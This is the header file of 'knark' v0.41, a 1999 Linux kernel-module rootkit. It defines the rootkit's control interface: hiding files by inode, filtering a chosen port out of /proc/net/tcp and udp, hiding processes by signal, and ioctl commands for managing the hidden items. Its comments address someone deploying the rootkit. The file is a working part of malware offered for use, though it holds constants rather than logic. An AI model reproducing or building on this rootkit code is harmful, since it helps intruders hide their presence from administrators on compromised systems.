/*
 * knark.h, part of the knark package v0.41
 * Linux 2.1-2.2 headerfile for the rest of the knark package.
 * (c) Creed @ #hack.se 1999 <creed@sekure.net>
 * 
 * Some parts of this can be changed, but things might break so I advice you
 * to leave this unchanged.
 * See README for more info.
 */

#ifndef _KNARK_H
#define _KNARK_H

#define KNARK_VERSION "v0.41"

/* Change this if you change the name of the module (and the proc dir). */
#define MODULE_NAME "knark"

/* Maximal number of hidden files/directories on a filesystem. */
#define MAX_SECRET_FILES 12
/* Maximal number of filesystems. */
#define MAX_SECRET_DEVS 8

/* This will be "grep -v"'d from /proc/net/[tcp|udp].
 * ":ABCD" will hide port 43981 (0xABCD == 43981) */
#define NETSTATHIDE ":ABCD"

/* Change this if you want to, it really doesn't matter. */
#define TIMEROOTNUM 0xdeadbeef

/* Debugging shit. */
#ifdef DEBUG
# ifdef __KERNEL__
#  define knark_debug(fmt, args...) printk(fmt, ## args)
# else
#  define knark_debug(fmt, args...) fprintf(stderr, fmt, ## args)
# endif
#else
#define knark_debug(fmt, args...)
#endif

/* Signals to hide/unhide processes with. I wouldn't change this. */
#define SIGINVISIBLE 31
#define SIGVISIBLE 32

/* Use ioctl on this fd to modify knark when it's loaded. Change this if
 * there's a chance that this number will be used by any other program. */
#define KNARK_ELITE_CMD 0xfffffffe


/* ioctl command args: */

/* Hide a file on the root filesystem. The argument is the inode number. */
#define KNARK_HIDE_FILE 1
/* Unhide a hidden file (implemented since v0.41). */
#define KNARK_UNHIDE_FILE 2
/* "grep -v" a string in a file (not implemented yet). */
#define KNARK_GREPV 3
/* Undo "grep -v" (not implemented yet). */
#define KNARK_UNGREPV 4

#endif _KNARK_H
